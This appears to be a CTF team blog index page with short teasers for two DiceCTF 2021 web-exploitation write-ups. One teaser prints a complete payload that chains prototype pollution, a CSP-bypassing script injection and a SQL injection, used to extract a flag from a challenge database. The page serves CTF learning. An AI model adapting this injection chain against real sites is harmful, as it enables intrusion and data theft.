bi0s
  •  Home
  •  Categories
  •  Archives
  •  Tags
  •  Home
  •  Categories
  •  Archives
  •  Tags

Web IDE - DiceCTF 2021

Yadhu Krishna M
2021-02-09
Web Exploitation

tl;dr

  • Unintended Solution: Cookie Path Restriction bypass using pop-up windows + JS Sandbox Escape
  • Intended Solution: Service Workers + JS Sandbox Escape
Read More
XSS DiceCTF JavaScript Sandbox Escape

Build A Better Panel - Dice CTF 2021

Az3z3l
2021-02-09
Web Exploitation

tl;dr

  • Payload: {"widgetName":"constructor","widgetData":"{\"prototype\":{\"srcdoc\":\"<script src='/admin/debug/add_widget?panelid=star7rix&widgetname=test123&widgetdata=%27%29%2C%28%27star7rix%27%2C+%28select+flag+from+flag%29%2C+%27%7B%22type%22%3A%22test123%22%7D%27%29+--'></script>\"}}"}
Read More
XSS Prototype Pollution CSP DiceCTF

Official blog of team bi0s

  Projects
  •   bi0s-wargame
    (Unraveling)
  •   bi0s-wiki
    (Free Encyclopedia)
  •   InCTF
    (Nationals CTF)
  •   InCTFj
    (Juniors CTF)

Made With Love and Coffee



Blog content follows the Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) License

Use Material X as theme, total visits times.